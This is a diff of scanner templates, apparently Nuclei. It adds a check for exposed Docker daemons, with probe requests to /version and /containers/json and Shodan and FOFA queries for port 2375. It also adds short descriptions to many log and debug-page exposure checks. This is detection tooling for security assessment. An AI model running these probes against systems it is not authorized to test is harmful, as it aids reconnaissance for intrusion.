+# digest: 4a0a0047304502207299fd92870b600690b62dac52985838e4bbf93bef00fdbad3648de0ce6ee1d4022100abb13ccb70d68451cff75389fedd7cf8a8cca19c2c9de05894e433102fd270b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml
new file mode 100644
index 0000000000..857e0c35fb
--- /dev/null
+++ b/http/exposures/docker-daemon-exposed.yaml
@@ -0,0 +1,41 @@
+id: docker-daemon-exposed
+
+info:
+  name: Docker Daemon Exposed
+  author: Arm!tage
+  severity: critical
+  description: |
+    Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.
+  metadata:
+    max-request: 1
+    shodan-query: port:2375 product:"docker"
+    fofa-query: app="docker-Daemon" && port="2375"
+    verified: true
+  tags: docker,exposure,misconfig
+
+http:
+  - raw:
+      - |
+        GET /version HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /v{{version}}/containers/json HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_1, "ApiVersion") && contains(body_1, "GitCommit") && contains(body_1, "GoVersion")  && contains(body_1, "KernelVersion")'
+          - 'contains(body_2, "Id") && contains(body_2, "Names") && contains(body_2, "Image") && contains(body_2, "Command") && contains(body_2, "PrivatePort") && contains(body_2, "PublicPort") || contains(body_2, "[]")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - '"ApiVersion":"(.*?)"'
+        internal: true
+# digest: 490a00463044022078569870dba91a13ef48bf89cc7acf390bd48f5466e1721acfa1337f23fd752802207843a2e01e46cb87cdc2cfa9f8ea3a3d5a0fa0ed378bee864de3e52ca24a4339:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/access-log.yaml b/http/exposures/logs/access-log.yaml
index 98c7974d7f..4c9b7b1898 100644
--- a/http/exposures/logs/access-log.yaml
+++ b/http/exposures/logs/access-log.yaml
@@ -4,6 +4,7 @@ info:
   name: Publicly accessible access-log file
   author: sheikhrishad
   severity: low
+  description: Log file was exposed.
   metadata:
     max-request: 4
   tags: logs,exposure
@@ -30,5 +31,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a0047304502210095fb5b97323ca835eb42388e82f84db0c0b95f76723ea8be92b2635765ae30fa02205a6195c28ccbbc9b26ff676f4e9b8cd3a7e78f092bd3527979b22fabde997498:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022055894681346ebdcd1557dd5195bb88e21fb88e13d491ac314b4bc0a4f63f9c54022100ce9956f43bf9bd0470b6feefc2623313960798c0d145069b8ae09b67a3fbd123:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/badarg-log.yaml b/http/exposures/logs/badarg-log.yaml
index dd00fbf5da..ab3dd142e0 100644
--- a/http/exposures/logs/badarg-log.yaml
+++ b/http/exposures/logs/badarg-log.yaml
@@ -4,6 +4,7 @@ info:
   name: Badarg Log File Exposure
   author: Hardik-Solanki
   severity: low
+  description: Badarg log file was exposed.
   reference:
     - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt
     - https://www.erlang.org/doc/reference_manual/errors.html
@@ -31,5 +32,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100ccab762c24899127b58ef26573c8cbc82273045bc966bc24a2d5de89911f8dfd022100aaca8061227f59e953358915739c51287bb5815ad750f7580c35665b51afb914:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100ed810f1918fc72d836ccbbc5c8d439c1fb953ab761d451915955d7a3d0ba26bb022100d4e489f74ebeb6a3acd89cb70292e308a4b8931dd5a6e26f347508cc752b510e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/clockwork-php-page.yaml b/http/exposures/logs/clockwork-php-page.yaml
index b46e942571..776dea7983 100644
--- a/http/exposures/logs/clockwork-php-page.yaml
+++ b/http/exposures/logs/clockwork-php-page.yaml
@@ -4,6 +4,8 @@ info:
   name: Clockwork PHP page exposure
   author: organiccrap
   severity: high
+  description: |
+    Clockwork php page was exposed, which allows admins to profile and debug the application, view database queries, HTTP requests, and other details right from the browser's developer tools.
   reference:
     - https://twitter.com/damian_89_/status/1250721398747791360
   metadata:
@@ -27,5 +29,4 @@ http:
           - <html ng-app="Clockwork" ng-csp="">
         part: body
         condition: or
-
-# digest: 4a0a00473045022017f7b11a6d86418caad2c0598f404dcd578b68d9e2178711837c93cc00790538022100b69ece8a769235db44a6184c1318fecb47f7ac472e95f8c3bb428f9b452168df:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100daba8699fcc5cc69a8649141aef9f28fb1b4d07255dff720296df32a7b3c10f8022100e61d20733b328fb95b1801052c00fe7087fe2d506f7c7b91c47fe5c1d43d2ad0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/development-logs.yaml b/http/exposures/logs/development-logs.yaml
index 6f82751d05..6da39cf56c 100644
--- a/http/exposures/logs/development-logs.yaml
+++ b/http/exposures/logs/development-logs.yaml
@@ -4,6 +4,7 @@ info:
   name: Discover development log files
   author: geeknik
   severity: info
+  description: Development log file was exposed.
   metadata:
     max-request: 3
   tags: logs,exposure,rails
@@ -45,5 +46,4 @@ http:
         part: header
         regex:
           - 'Last-Modified:.*'
-
-# digest: 4b0a00483046022100ec0cab19e41834dbd98b3fad6f39e1e84ae68fda70aa02cfc0493041062fc9b1022100d427db1cb48ea9829c9d0dfe80fb9d19aff6ea0d86f868d72ca1df917d330835:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008713d353ce81783cb1e3062f886ed47b099fcfd1b6b046360a6815aa9ed5bcc1022100acba3af7f6457b3b8e16eadaae76ba8703560e6869723248bde3c163b7e11efb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/django-debug-exposure.yaml b/http/exposures/logs/django-debug-exposure.yaml
index 1bf298f729..31c6aaadf4 100644
--- a/http/exposures/logs/django-debug-exposure.yaml
+++ b/http/exposures/logs/django-debug-exposure.yaml
@@ -4,6 +4,7 @@ info:
   name: Django Debug Exposure
   author: geeknik
   severity: high
+  description: Django debug mode enabled exposes internal information.
   reference:
     - https://twitter.com/Alra3ees/status/1397660633928286208
   metadata:
@@ -29,5 +30,4 @@ http:
           - "DJANGO"
           - "ADMIN_PASSWORD"
         condition: and
-
-# digest: 4a0a004730450221008ff81e15c36296cd75b01124d993e8e61236dfff28fef7feb42b759d1226644c02201a1348afce37dd3a899eea16a4422a346cd8589694c98a7ef5cab4bae6f4fcdc:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022075f8eb23f058287e94f409e156c595d9a3160eeca81f66a83d61be4144301dc7022100a96b53e8b7688c50241e531c5e45dac6fb3788d27fce1f21ac315b1279ddbbf6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/error-logs.yaml b/http/exposures/logs/error-logs.yaml
index 5803a02057..4d036f0c6d 100644
--- a/http/exposures/logs/error-logs.yaml
+++ b/http/exposures/logs/error-logs.yaml
@@ -4,6 +4,7 @@ info:
   name: Common Error Log Files
   author: geeknik,daffainfo,ELSFA7110,Hardik-Solanki
   severity: low
+  description: Error log files were exposed.
   metadata:
     max-request: 29
   tags: logs,exposure,error
@@ -67,5 +68,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100f3c73192ba3d1cb5bbe28e1d52a70949a853ec0c8149f14159944be908094f2a022100df650fbb26784667df3e9444ebad59b342a54100fae7cd21c754578ad49fcddc:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502206c44c24795b02dab3964041c43dc286be2fbb40aa3959ed89347c365fffcaac0022100ed65c1b0bb7e6c1aba1f35463ffab1c29afad02fcd2f474d020181279ac5a210:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/event-debug-server-status.yaml b/http/exposures/logs/event-debug-server-status.yaml
index af4409f96f..cbf628bda0 100644
--- a/http/exposures/logs/event-debug-server-status.yaml
+++ b/http/exposures/logs/event-debug-server-status.yaml
@@ -4,6 +4,7 @@ info:
   name: Event Debug Server Status
   author: pussycat0x
   severity: low
+  description: Exposes server status,logs and internal information.
   metadata:
     verified: true
     max-request: 1
@@ -32,5 +33,4 @@ http:
         group: 1
         regex:
           - 'Version: <tt>([0-9.]+)'
-
-# digest: 490a00463044022036c84bdf8a3d89975b5612fd653115ae12a8bbbf07f0882d217f8a01734a2b3a0220050a92c4cc1ae8ef412f6cedb5e72571f1419b5d8feae18be05627ae8ff39ab8:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204f68b5b287fd6643af9338f772846c3c6a47001eb7c6b75219e57698c89697e002200b59170f8b9f236100afdf1730ce51f2f414e1094bd8f23d207b2ee475abbda1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/ffserver-status.yaml b/http/exposures/logs/ffserver-status.yaml
index 986acdd685..ff2670714d 100644
--- a/http/exposures/logs/ffserver-status.yaml
+++ b/http/exposures/logs/ffserver-status.yaml
@@ -4,6 +4,7 @@ info:
   name: FFserver Status Detect
   author: notnotnotveg,tess
   severity: low
+  description: FFserver status panel exposed.
   metadata:
     verified: true
     max-request: 1
@@ -28,5 +29,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a0047304502210094b54711f14d036d3388b648950f1012c8f64200190d38ee556883428b28dca6022003f475e215e2ec1446d307a549e324fdf1967d76faa956679be780b0926f90c7:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100ddf623cb8f806e0686c2af4a23ce65a12cf59b4e6966a6f0338a1d2430336f8c022100d704c92d7289d3b5cd4318a4d991bd936e7f08780846e9944751210ff718d3c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/firebase-debug-log.yaml b/http/exposures/logs/firebase-debug-log.yaml
index 100eeb04ed..b997e1541a 100644
--- a/http/exposures/logs/firebase-debug-log.yaml
+++ b/http/exposures/logs/firebase-debug-log.yaml
@@ -4,6 +4,7 @@ info:
   name: Firebase Debug Log File Exposure
   author: Hardik-Solanki
   severity: low
+  description: Firebase debug log file was exposed.
   reference:
     - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt
   metadata:
@@ -30,5 +31,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a00463044022007a20a9aee2695e71986090c373941718213907631e86585d90d22d42b13168e022005f842f7db0354fc30e6b2c8e80e2bc3e3e0fce22dacc1d6f3c3c216a98a1478:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204e249ddcd6a885d8a5be937891ff43afdc4b5ae2de516c387577a3cd2e2e7fb0022100d1ea4636c54b8d72807b2e607568b4a13bd32b7b6ecdd0ebe199ff30c799eabc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/git-exposure.yaml b/http/exposures/logs/git-exposure.yaml
index 9d40408712..69c687b77e 100644
--- a/http/exposures/logs/git-exposure.yaml
+++ b/http/exposures/logs/git-exposure.yaml
@@ -4,6 +4,7 @@ info:
   name: Git Metadata Directory Exposure
   author: tess
   severity: medium
+  description: Git Metadata Directory exposed.
   metadata:
     verified: true
     max-request: 1
@@ -29,5 +30,4 @@ http:
       - type: status
         status:
           - 403
-
-# digest: 4b0a00483046022100cea0be09c865dd3405daad4c8b7c46f68b69739482413a4744905042a1d4d66a022100e497157b633e91b5241a390abfae3fb33127225ec9d8f082abc54bf0f9daaf5f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221008bc046d4c91a23baac5870a3d26aba9284b825c7c70d903623a002a07575627d02200e71eb8a48bf292645cc08fc902598e7f68e0e30b5428ae3847580170fd3ad36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/jboss-seam-debug-page.yaml b/http/exposures/logs/jboss-seam-debug-page.yaml
index f845f1968c..261c65f370 100644
--- a/http/exposures/logs/jboss-seam-debug-page.yaml
+++ b/http/exposures/logs/jboss-seam-debug-page.yaml
@@ -4,6 +4,7 @@ info:
   name: Jboss Seam Debug Page Enabled
   author: dhiyaneshDK
   severity: medium
+  description: Jboss Seam Debug Page was exposed.
   reference:
     - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml
   metadata:
@@ -26,5 +27,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100cc9646faaac236cac4769f6c2688a1e27a7a34b6ab48a1f48b51fc0344a3438f022100deeebb1391926ed34aee7eae776b890543e21738790ba3301ea1ed0b6130f4d8:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e8411b45c22ca433e5f3bd5fe956f5b345fc7057cfd50ba2e94466da76bccc48022100d548feaa4f8967210c5093ab640433f3dcbc610e1afe2e12b9bf2232fa240129:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/lucee-stack-trace.yaml b/http/exposures/logs/lucee-stack-trace.yaml
index be3b3fc5b5..c1afb1a58d 100644
--- a/http/exposures/logs/lucee-stack-trace.yaml
+++ b/http/exposures/logs/lucee-stack-trace.yaml
@@ -4,6 +4,7 @@ info:
   name: Lucee Stack Trace Error
   author: dhiyaneshDK
   severity: low
+  description: Lucee Stack Trace error exposed.
   metadata:
     max-request: 1
     shodan-query: http.title:"Lucee"
@@ -25,5 +26,4 @@ http:
           - 500
           - 200
         condition: or
-
-# digest: 4a0a00473045022100fb1da0454d94ccf8171e138f453f8fbbda5b98ee6a639a724f678396313d261002207eb27d526faccf8090e1a341433e2d793bda9c428039c30888ed3e14c3ac5234:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e4b5779aa5862d5d3f2a6d4cc15748afe3b43d4c8d11eabb8e9c6f1c9c484b91022100b1d76e95217d8c2e16c3685cdf0eff1140f6f14766e883bcb3b04e643838ad29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/nginx-shards.yaml b/http/exposures/logs/nginx-shards.yaml
index 2549732630..4323be0804 100644
--- a/http/exposures/logs/nginx-shards.yaml
+++ b/http/exposures/logs/nginx-shards.yaml
@@ -4,6 +4,7 @@ info:
   name: NGINX Shards Disclosure
   author: DhiyaneshDK
   severity: medium
+  description: NGINX internal information, shards page exposed.
   reference:
     - https://infosecwriteups.com/how-i-got-rce-in-the-world-largest-russian-company-8e6e8288bc4e
   metadata:
@@ -32,5 +33,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a004830460221009b2043c917f51ad131f632fff22016655eb0d903d6aa914166f99104adca0b77022100d5c3dad52fc86f588456b9fb495b833ba1f0927c2464af67dd72d34abb30ca10:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022024cc40e809930028081762a27444d510297d15af4466cbdcec538c44e6eca2a7022100cc3596dfc38b438281639ad04b97eb3371445f7b719d79d53b22ad400ec3e4cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/npm-debug-log.yaml b/http/exposures/logs/npm-debug-log.yaml
index c69f02087f..173054504b 100644
--- a/http/exposures/logs/npm-debug-log.yaml
+++ b/http/exposures/logs/npm-debug-log.yaml
@@ -4,6 +4,7 @@ info:
   name: NPM Debug Log Disclosure
   author: Hardik-Solanki
   severity: low
+  description: NPM Debug log file exposed.
   reference:
     - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt
     - https://docs.npmjs.com/generating-and-locating-npm-debug.log-files
@@ -33,5 +34,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022067ac9b9b5b4180d43755571a3f37e4af5eb7bec80ea9093e0362750fdaf36a4c022100ae9e2d86fbd99b36c77eaadcdf4a76fcc23c18eece43f7b227b3328361a4f937:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100db233ec77fffd7ac6156a1aa42178960658c69f7b7a0eda7b9da2800bf56865102206694c2b9fb3e6abb338df283679eeff18e1a2dfa310960321515ba3c8c9114e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/opentsdb-status.yaml b/http/exposures/logs/opentsdb-status.yaml
index 055f8228df..3677273276 100644
--- a/http/exposures/logs/opentsdb-status.yaml
+++ b/http/exposures/logs/opentsdb-status.yaml
@@ -4,6 +4,7 @@ info:
   name: OpenTSDB - Detect
   author: pussycat0x
   severity: low
+  description: OpenTSDB stats exposed which is commonly used in monitoring and observability scenarios where tracking and analyzing the performance of systems, applications, and infrastructure over time is essential.
   reference: |
     http://opentsdb.net/
   metadata:
@@ -35,5 +36,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100eed3af9e08841f4a3aa08cf671596c8132016eb16c342b707f03c4e279f2baef0221009ad9c093c9cce5fb5d40d1b1fb9a28cf0f7a400d5f47d3f60f4b24e0e4bfc300:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022031c2a403a51a74737f3470925b045b17c5a30261800f184d58791009f9508963022100b177396ccd83f7cfff0f44df34c527919b742ceda04ed807a9d841e9eb9e5a36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/production-log.yaml b/http/exposures/logs/production-log.yaml
index 645743f86d..19721ffbf7 100644
--- a/http/exposures/logs/production-log.yaml
+++ b/http/exposures/logs/production-log.yaml
@@ -4,6 +4,7 @@ info:
   name: Production Log File Disclosure
   author: geeknik
   severity: low
+  description: Production log file was exposed.
   metadata:
     verified: true
     max-request: 3
@@ -34,5 +35,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a0047304502204f46774f54879b8b387b742e70329d14c47fd4ab865dd250079e6d3a8c53fdfc0221009aa0cecd1b50fd59991b10a2ebc1056a01308a4e8ab4c2584bb2fba04df515e3:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220199352cf9635064da4c1c8696564df4aece8e30dff637802b452189e7ae1fb12022100b9847a6091264aece3faa65a7c3f8331fceb3d385e0a90103a7f029b34661cac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/production-logs.yaml b/http/exposures/logs/production-logs.yaml
index 78ee1df847..810d8ee8e5 100644
--- a/http/exposures/logs/production-logs.yaml
+++ b/http/exposures/logs/production-logs.yaml
@@ -4,6 +4,7 @@ info:
   name: Discover production log files
   author: geeknik
   severity: info
+  description: Production log file was exposed.
   metadata:
     max-request: 3
   tags: exposure,logs,rails
@@ -39,5 +40,4 @@ http:
         part: header
         regex:
           - 'Last-Modified:.*'
-
-# digest: 4a0a00473045022100a38713583e2a55ad0343c4115da819838f3f4cd0ebcef23f58e7a5541c1e150302202cd2dd72c9f7bcc7dbbd00619a14637be21dfd8cc1950f1d7cd9b035ddca9d8f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220069d9de39e4fbf696ec729078008a9f91411dc7d037e66c89ff96e23c973bc02022100d29de74e008f3ca4ef3e4b650f02b572d184e0a9de3380eab4a37cb6b35b25ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/rails-debug-mode.yaml b/http/exposures/logs/rails-debug-mode.yaml
index 3370092855..7b30e36c1f 100644
--- a/http/exposures/logs/rails-debug-mode.yaml
+++ b/http/exposures/logs/rails-debug-mode.yaml
@@ -4,6 +4,7 @@ info:
   name: Rails Debug Mode
   author: pdteam
   severity: medium
+  description: Rails debug mode is enabled.
   metadata:
     max-request: 1
   tags: debug,rails,exposure,intrusive
@@ -20,5 +21,4 @@ http:
           - "Rails.root:"
           - "Action Controller: Exception caught"
         condition: and
-
-# digest: 4a0a00473045022042854b3919b39517b14a29a2b82cbe314d47bcd6a3bfa0c0bb8133dc4eb77102022100abc956e89335f1aa821e643e9c9ef86e86ab29a14d64e97c815af063b1ea75d8:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022032b4ac1b752bc49bad211b086747a6b513069249d0119c514d0c5bb4273ce0f3022100bb3cffbab5dc40220beeb5c9a33a8b54794e5ab5086e8ec6aacbe479ec7c94a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/redis-exception-error.yaml b/http/exposures/logs/redis-exception-error.yaml
index 7fdbd0101f..8ed61fb42d 100644
--- a/http/exposures/logs/redis-exception-error.yaml
+++ b/http/exposures/logs/redis-exception-error.yaml
@@ -4,6 +4,7 @@ info:
   name: Redis Exception Connection Error Page
   author: DhiyaneshDk
   severity: low
+  description: Redis exception connection error page detected.
   reference:
     - https://www.facebook.com/ExWareLabs/photos/pcb.5563308760399619/5563307330399762/
   metadata:
@@ -32,5 +33,4 @@ http:
       - type: status
         status:
           - 500
-
-# digest: 4a0a00473045022100b215b67cb4bb49746974206a506fcf3b244b7999a09707ba70720fce6b3b8d57022058c72b2ebbd8f5dd41bceea063780c116b04236820ecc8f01cbb8e598f6fa776:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221009effb92156ed3b123be771513d8faeb337be7c992827076cd2ba1f0747c4287b022100cf7d05453966d6ce73436698e470203d6008bbab73750ed3867c58d81411848e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/roundcube-log-disclosure.yaml b/http/exposures/logs/roundcube-log-disclosure.yaml
index 298004ac2d..54c237b5e4 100644
--- a/http/exposures/logs/roundcube-log-disclosure.yaml
+++ b/http/exposures/logs/roundcube-log-disclosure.yaml
@@ -4,6 +4,7 @@ info:
   name: Roundcube Log Disclosure
   author: dhiyaneshDk,kazet
   severity: medium
+  description: Roundcube Log file was disclosed.
   reference:
     - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json
   metadata:
@@ -52,5 +53,4 @@ http:
       - type: dsl
         dsl:
           - content_length
-
-# digest: 4a0a00473045022073f1ccc9de6404bd1a79a1ad936150ff16e09fb3ec06d522a33c8a62df33177e02210086e3e0a838041441c4803e08f7dbc5ea591c848a79f9469dbb5e0835b691a094:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022002319e5d254ede570e3c72f3b3a3bb99e6e13f1a94efd2d0a1081ca408d445d4022100cfb01c4191b36f6cc6aa5c621f73266283e141aeb944d6d161969d3e1af81a1e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/struts-debug-mode.yaml b/http/exposures/logs/struts-debug-mode.yaml
index c0200646a2..f0c8fb68a4 100644
--- a/http/exposures/logs/struts-debug-mode.yaml
+++ b/http/exposures/logs/struts-debug-mode.yaml
@@ -4,6 +4,7 @@ info:
   name: Apache Struts setup in Debug-Mode
   author: pdteam
   severity: low
+  description: Apache Struts debug mode is enabled.
   metadata:
     max-request: 1
   tags: logs,struts,apache,exposure,setup
@@ -19,5 +20,4 @@ http:
           - "<debug>"
           - "<struts.actionMapping>"
         condition: and
-
-# digest: 4a0a0047304502203e193bb76801bc76123140882134856dfcf09eb0ed39471b851936d1e3feca7002210087fad05a15bf6288fa4cf78481d7d96d7a803510f292313612070571958dff18:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100bf6dbd31ef92f8e1dc40fb686e16761845933696c79fb4bb1b2576a03644deb0022005dd1ca7689260b05edd0714b26365856dec3d802159866075540766f352e443:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/trace-axd-detect.yaml b/http/exposures/logs/trace-axd-detect.yaml
index 9d4c322c9a..f448030e65 100644
--- a/http/exposures/logs/trace-axd-detect.yaml
+++ b/http/exposures/logs/trace-axd-detect.yaml
@@ -4,6 +4,7 @@ info:
   name: ASP.NET Trace.AXD Information Leak
   author: dhiyaneshDK
   severity: low
+  description: ASP.NET Trace.AXD Information was exposed.
   reference:
     - https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a004730450220563e4efb80724e765de59e3025cd8d4bcdb4186a7d7ac3570f7e469b1452cd18022100b4db366039da509cbb6307c85cda2ad12583de46ec828aca08fa600d7c31a998:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008771bce10b061ef59dc929c7a4bc010111a0cca43c76d622c927f8eb5ab0adc8022100f7f270c7d32df57ad0c980af7c4c1a3aac1ae6b0cb965462de558d61c77aa1d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/webalizer-xtended-stats.yaml b/http/exposures/logs/webalizer-xtended-stats.yaml
index 381dc30deb..f5aeaba716 100644
--- a/http/exposures/logs/webalizer-xtended-stats.yaml
+++ b/http/exposures/logs/webalizer-xtended-stats.yaml
@@ -4,6 +4,7 @@ info:
   name: Webalizer Xtended Statistics Exposed
   author: ritikchaddha
   severity: low
+  description: Webalizer Xtended Statistics is exposed.
   reference:
     - https://www.patrickfrei.ch/webalizer/
   metadata:
@@ -30,5 +31,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022035e49538161a1816b02f3b1dff9a00c4f4be3a258b6b9f910b77ad9c1f7e0f02022100dc611d3ab1647bc0c3777607238115983f76be21e1603abdb3c4571903b5f603:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100ae228ac8772128506f03f0c7ff157c20e075ea77ede804e2af945189023874f30220365a0e762b99f6d8eb175e02ba6b35695a645385993b49c6bd7ce1c480cbbc85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/wp-app-log.yaml b/http/exposures/logs/wp-app-log.yaml
index da42c200f9..9fe1c07e59 100644
--- a/http/exposures/logs/wp-app-log.yaml
+++ b/http/exposures/logs/wp-app-log.yaml
@@ -4,6 +4,7 @@ info:
   name: Discover wp-app.log Files
   author: geeknik
   severity: info
+  description: wp-app.log file is exposed.
   metadata:
     max-request: 1
   tags: exposure,logs
@@ -31,5 +32,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a00463044022051d696bed2a1ef214dab1c4984a10f9a31a8d007c3d355931fcb6f9e424d0a41022050adc88dd9d313e7e57f11c9ccd82f12e6ed0997c34007c3059b9a05744abede:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207c61a97a9bb5284043f12cb2da99f7f81b528d2be205b34d64c3d52b510b564c022038d1ff2219137acb259e0d0ff98dac54f95c3c0e3b19dec9ebbba3010038cfd9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/ws-ftp-log.yaml b/http/exposures/logs/ws-ftp-log.yaml
index 0e1d707ff4..81e329b448 100644
--- a/http/exposures/logs/ws-ftp-log.yaml
+++ b/http/exposures/logs/ws-ftp-log.yaml
@@ -4,6 +4,7 @@ info:
   name: WS FTP File Disclosure
   author: Hardik-Solanki
   severity: low
+  description: WS_FTP software, which is a popular FTP (File Transfer Protocol) client used for transferring files between a local computer and a remote server has its log file exposed.
   metadata:
     verified: true
     max-request: 2
@@ -29,5 +30,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100fc3a47edc87a76a7f086898cb8296871df2c3eba968960562ede7dce14bda5ea022100a2e6bb28e0b4ae797bf29bbbf35348ef5daed960d1486903f3f5d92e000e67a9:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220613888ed65c3ff67ef372788dbe09ded04db2e31c1807d7107af61c5c1471f2202207e3ca665c1da0f5cd82f750562089d1572fb66130fcec76035dafb570a9d4741:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/yii-error-page.yaml b/http/exposures/logs/yii-error-page.yaml
index 81bf4d05c0..6e7963b0de 100644
--- a/http/exposures/logs/yii-error-page.yaml
+++ b/http/exposures/logs/yii-error-page.yaml
@@ -4,6 +4,7 @@ info:
   name: Yii Error Page - Detct
   author: DhiyaneshDk
   severity: unknown
+  description: Yii (An application framework to handle and manage errors) error page detected.
   metadata:
     verified: true
     max-request: 1
@@ -25,5 +26,4 @@ http:
       - type: status
         status:
           - 500
-
-# digest: 4a0a00473045022100d75395fce0b90ab93ef7cb0dbfd18cba52029052522c8b37596a6391c24487a402201cc527cc73109445f4786c39d6dc6c4b33fd7f7660dd182351f3cd28ffb708cc:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200293be2ab6388822de79f4ed392948c53d9154ea7d778c6cedd46824bdc08d44022100b3c26629597543e1cd282a042e37552e926f089aab28451584054f8aae17806c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/zm-system-log-detect.yaml b/http/exposures/logs/zm-system-log-detect.yaml
index 4ebe80e6ab..4338fde802 100644
--- a/http/exposures/logs/zm-system-log-detect.yaml
+++ b/http/exposures/logs/zm-system-log-detect.yaml
@@ -4,6 +4,7 @@ info:
   name: zm-system-log-detect
   author: pussycat0x
   severity: low
+  description: Zm system log file exposed.
   reference: https://www.exploit-db.com/ghdb/6926
   metadata:
     max-request: 2
@@ -26,5 +27,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100f5d17953a7baead39797c8d7d1662ddaa898065f92175d0b95886bf5933f1d9902210084399f206a5106015b9621cb3e1451d25cd73c2158fe5dbd6f0cd6e60a4ba3e7:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a0048304602210098d215618de6c90f097cddd2d5d6cbac49794e24c99c890f464b6cfd865ab332022100f20ad9a4e5f5c1f5bd434ccd8414209742d50b842f27cacfeea880ce3052c291:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
